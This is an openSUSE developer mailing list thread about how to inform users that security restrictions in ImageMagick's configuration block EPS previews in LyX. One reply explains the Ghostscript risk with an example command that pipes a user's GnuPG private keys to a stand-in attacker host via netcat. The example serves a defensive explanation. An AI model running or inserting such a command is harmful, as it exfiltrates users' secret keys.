[opensuse-factory] How to inform users of security settings (boo#713289)
Hi, I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working? I found out, because I know a little of the inner workings of LyX, with the help of Google and by looking through related packages in Yast. Can we not find a better way to inform users? An idea to shoot on: when there were issues with plasma and the nouveau 3D driver, the user installing those drivers was informed that he took a risk. Can we use a similar way when a user for example installs ImageMagick: "for security reasons some settings are disabled in openSUSE, if you know what you are doing, you can do this and that to enable those options"? As a user I would appreciate to be informed, especially about something like this, that I know nothing about. Do you think this is a good idea? Or has someone a better one? Thanks, Cor -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
On Thursday 2019-07-04 13:06, Cor Blom wrote:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit. -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ... +- Update the description in the spec file with information on + security setting for ImageMagick in openSUSE. See boo#1139928 + It seems the only thing we can do about it. There is the bug, it is open. Ciao, Marcus -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
Op 04-07-19 om 13:45 schreef Marcus Meissner:
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ...
+- Update the description in the spec file with information on + security setting for ImageMagick in openSUSE. See boo#1139928 + It seems the only thing we can do about it.
There is the bug, it is open.
Ciao, Marcus
Yes, sorry, 713289 was SR number. The bugreport number is #1139928 My mistake. Cor -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
Op 04-07-19 om 13:57 schreef Cor Blom:
Op 04-07-19 om 13:45 schreef Marcus Meissner:
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ...
+- Update the description in the spec file with information on + security setting for ImageMagick in openSUSE. See boo#1139928 + It seems the only thing we can do about it.
There is the bug, it is open.
Ciao, Marcus
Yes, sorry, 713289 was SR number. The bugreport number is #1139928 My mistake.
And the relevant changelog in ImageMagick is: Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com - provide two new (conflicting) packages with configuration [bsc#1122033]: * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions) * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions) and use update-alternatives for selecting configurations. - remove code for < 1315 - deleted patches - ImageMagick-disable-insecure-coders.patch (renamed) - added patches + ImageMagick-configuration-SUSE.patch -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
On 04/07/2019 14.24, Cor Blom wrote:
Op 04-07-19 om 13:57 schreef Cor Blom:
Op 04-07-19 om 13:45 schreef Marcus Meissner:
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ...
+- Update the description in the spec file with information on + security setting for ImageMagick in openSUSE. See boo#1139928 + It seems the only thing we can do about it.
There is the bug, it is open.
Yes, sorry, 713289 was SR number. The bugreport number is #1139928 My mistake.
And the relevant changelog in ImageMagick is:
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]: * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions) * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions) and use update-alternatives for selecting configurations. - remove code for < 1315 - deleted patches - ImageMagick-disable-insecure-coders.patch (renamed) - added patches + ImageMagick-configuration-SUSE.patch
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it. Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work. -- Cheers / Saludos, Carlos E. R. (from 15.0 x86_64 at Telcontar)
Op 04-07-19 om 14:34 schreef Carlos E. R.:
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it.
Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work.
Well, there are many different users. I read package descriptions in Yast, I don't read README's, unless I am pointed in that direction in the description. So If there is no other solution, I probably should do both. Cor -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
On 04/07/2019 14.51, Cor Blom wrote:
Op 04-07-19 om 14:34 schreef Carlos E. R.:
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it.
Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work.
Well, there are many different users. I read package descriptions in Yast, I don't read README's, unless I am pointed in that direction in the description.
Package description, certainly, most of us read it, in YaST (dunno about zypper). But the Changelog, no, which is what was posted above.
So If there is no other solution, I probably should do both.
Maybe an indication in the description with longer explanation in README.SUSE. This file typically described what was different in the openSUSE package compared to upstream. -- Cheers / Saludos, Carlos E. R. (from 15.0 x86_64 at Telcontar)
On 04/07/2019 22:04, Carlos E. R. wrote:
On 04/07/2019 14.24, Cor Blom wrote:
Op 04-07-19 om 13:57 schreef Cor Blom:
Op 04-07-19 om 13:45 schreef Marcus Meissner:
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ...
+- Update the description in the spec file with information on + security setting for ImageMagick in openSUSE. See boo#1139928 + It seems the only thing we can do about it.
There is the bug, it is open.
Yes, sorry, 713289 was SR number. The bugreport number is #1139928 My mistake.
And the relevant changelog in ImageMagick is:
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]: * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions) * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions) and use update-alternatives for selecting configurations. - remove code for < 1315 - deleted patches - ImageMagick-disable-insecure-coders.patch (renamed) - added patches + ImageMagick-configuration-SUSE.patch
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it.
Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work.
Users probably won't read that, but they will google, and hopefully that will lead them to this thread or a forum post. -- Simon Lees (Simotek) http://simotek.net Emergency Update Team keybase.io/simotek SUSE Linux Adelaide Australia, UTC+10:30 GPG Fingerprint: 5B87 DB9D 88DC F606 E489 CEC5 0922 C246 02F0 014B -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
On 05/07/2019 03.25, Simon Lees wrote:
On 04/07/2019 22:04, Carlos E. R. wrote:
On 04/07/2019 14.24, Cor Blom wrote:
Op 04-07-19 om 13:57 schreef Cor Blom:
Op 04-07-19 om 13:45 schreef Marcus Meissner:
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:
> Hi, > > I got a bug report that image preview of eps files was not > working in LyX (boo#713289). I closed this as WONTFIX, > because those settings are there for a reason. What is > frustrating for users is: how do they know this is the reason > a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ...
+- Update the description in the spec file with information on + security setting for ImageMagick in openSUSE. See boo#1139928 + It seems the only thing we can do about it.
There is the bug, it is open.
Yes, sorry, 713289 was SR number. The bugreport number is #1139928 My mistake.
And the relevant changelog in ImageMagick is:
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]: * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions) * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions) and use update-alternatives for selecting configurations. - remove code for < 1315 - deleted patches - ImageMagick-disable-insecure-coders.patch (renamed) - added patches + ImageMagick-configuration-SUSE.patch
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it.
Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work.
Users probably won't read that, but they will google, and hopefully that will lead them to this thread or a forum post.
The description shown by YaST has great visibility, and it points to the readme. Is this description the same as shown by Search of a page on our web pages? If it is, they will see the readme mentioned there, too. -- Cheers / Saludos, Carlos E. R. (from 15.0 x86_64 at Telcontar)
Am 04.07.19 um 14:24 schrieb Cor Blom:
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]: * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions) * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions) and use update-alternatives for selecting configurations. - remove code for < 1315 - deleted patches - ImageMagick-disable-insecure-coders.patch (renamed) - added patches + ImageMagick-configuration-SUSE.patch
on tumbleweed 20190607 there is in update-alternatives only one entry: choice: prority: /etc/ImageMagick-7-suse 10 nothing to select between ??? how to switch to the upstream settings? simoN -- www.becherer.de -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
Simon Becherer píše v Čt 04. 07. 2019 v 15:12 +0200:
Am 04.07.19 um 14:24 schrieb Cor Blom:
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]: * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions) * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions) and use update-alternatives for selecting configurations. - remove code for < 1315 - deleted patches - ImageMagick-disable-insecure-coders.patch (renamed) - added patches + ImageMagick-configuration-SUSE.patch
on tumbleweed 20190607
there is in update-alternatives only one entry: choice: prority: /etc/ImageMagick-7-suse 10
nothing to select between ???
how to switch to the upstream settings?
Please either file bugs or go to support channel. This mailinglist is supposed to be used for development. Also the upstream configuration is most probably in package 'ImageMagick-config-7-upstream' so just install that and switch to it. Tom
Hello, On Jul 4 14:24 Cor Blom wrote (excerpt):
Op 04-07-19 om 13:57 schreef Cor Blom:
Op 04-07-19 om 13:45 schreef Marcus Meissner:
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ...
+- Update the description in the spec file with information on + security setting for ImageMagick in openSUSE. See boo#1139928 + It seems the only thing we can do about it.
There is the bug, it is open.
Yes, sorry, 713289 was SR number. The bugreport number is #1139928 My mistake.
And the relevant changelog in ImageMagick is:
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]: * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions) * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions) and use update-alternatives for selecting configurations. - remove code for < 1315 - deleted patches - ImageMagick-disable-insecure-coders.patch (renamed) - added patches + ImageMagick-configuration-SUSE.patch
FYI: For some background information about the root cause behind all those PostScript/Ghostscript related security issues see the section "It is crucial to limit access to CUPS to trusted users" in https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings that reads (excerpts): ------------------------------------------------------------------- PostScript but also PDF to some extent ... is actually a program. ... PostScript is a general purpose Turing-complete programming language (cf. https://en.wikipedia.org/wiki/PostScript) that supports in particular file access on the system disk. When Ghostscript processes PostScript it runs a PostScript program as the user who runs Ghostscript ... When Ghostscript processes an arbitrary PostScript file, the user who runs Ghostscript runs an arbitrary program which can do anything on the system where Ghostscript runs that this user is allowed to do on that system. To make it safer when Ghostscript runs a PostScript program the Ghostscript command line option '-dSAFER' disables certain file access functionality (for details see /usr/share/doc/ghostscript/*/Use.htm). ... Its name 'SAFER' says everything: It makes it 'safer' to let Ghostscript run a PostScript program, but it does not make it completely safe. ------------------------------------------------------------------- Simply put: Via some special (but well known) indirections in Ghostscript a PostScript program or an Encapsulated PostScript [EPS] program that a user runs via Ghostscript could execute certain stuff which results basically the equivalent of things like netcat server.attacker.net 12345 </home/user/.gnupg/private-keys when an innocent user only liked to view the graphical output of a malicious PostScript program or convert it into another (graphical) data type. Cf. http://bugzilla.opensuse.org/show_bug.cgi?id=1134327#c13 In the end it means: By default it must not be allowd to let Ghostscript (or any other PostScript interpreter) run arbitrary PostScript programs from (possibly) untrusted origin. Kind Regards Johannes Meixner -- SUSE LINUX GmbH - HRB 21284 (AG Nuernberg) GF: Felix Imendoerffer, Mary Higgins, Sri Rasiah
Op 04-07-19 om 16:07 schreef Johannes Meixner:
YI:
For some background information about the root cause behind all those PostScript/Ghostscript related security issues see the section "It is crucial to limit access to CUPS to trusted users" in https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings that reads (excerpts): ------------------------------------------------------------------- PostScript but also PDF to some extent ... is actually a program. ... PostScript is a general purpose Turing-complete programming language (cf. https://en.wikipedia.org/wiki/PostScript) that supports in particular file access on the system disk. When Ghostscript processes PostScript it runs a PostScript program as the user who runs Ghostscript ... When Ghostscript processes an arbitrary PostScript file, the user who runs Ghostscript runs an arbitrary program which can do anything on the system where Ghostscript runs that this user is allowed to do on that system. To make it safer when Ghostscript runs a PostScript program the Ghostscript command line option '-dSAFER' disables certain file access functionality (for details see /usr/share/doc/ghostscript/*/Use.htm). ... Its name 'SAFER' says everything: It makes it 'safer' to let Ghostscript run a PostScript program, but it does not make it completely safe. -------------------------------------------------------------------
Simply put:
Via some special (but well known) indirections in Ghostscript a PostScript program or an Encapsulated PostScript [EPS] program that a user runs via Ghostscript could execute certain stuff which results basically the equivalent of things like
netcat server.attacker.net 12345 </home/user/.gnupg/private-keys
when an innocent user only liked to view the graphical output of a malicious PostScript program or convert it into another (graphical) data type.
Cf. http://bugzilla.opensuse.org/show_bug.cgi?id=1134327#c13
In the end it means:
By default it must not be allowd to let Ghostscript (or any other PostScript interpreter) run arbitrary PostScript programs from (possibly) untrusted origin.
Thanks for the information. Thanks all for input. My proposal was not met with enthusiasm, so that is a no-go. I have added a README.SUSE with all information and options the user has. In the description field I refer to this. It is in Publishing/lyx, for those who would like to give feedback. I will submit it later to factory. Kind Regards, Cor -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
Em qui, 4 de jul de 2019 às 08:07, Cor Blom <cornelisbb@gmail.com> escreveu:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working? I found out, because I know a little of the inner workings of LyX, with the help of Google and by looking through related packages in Yast. Can we not find a better way to inform users?
Hi, What about addind a note to the release notes? Regards, Luiz -- To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
On 04/07/2019 14.45, Luiz Fernando Ranghetti wrote:
Em qui, 4 de jul de 2019 às 08:07, Cor Blom <cornelisbb@gmail.com> escreveu:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working? I found out, because I know a little of the inner workings of LyX, with the help of Google and by looking through related packages in Yast. Can we not find a better way to inform users?
Hi,
What about addind a note to the release notes?
Certainly, but must be kept there for years to come. -- Cheers / Saludos, Carlos E. R. (from 15.0 x86_64 at Telcontar)
participants (9)
-
Carlos E. R. -
Cor Blom -
Jan Engelhardt -
Johannes Meixner -
Luiz Fernando Ranghetti -
Marcus Meissner -
Simon Becherer -
Simon Lees -
Tomas Chvatal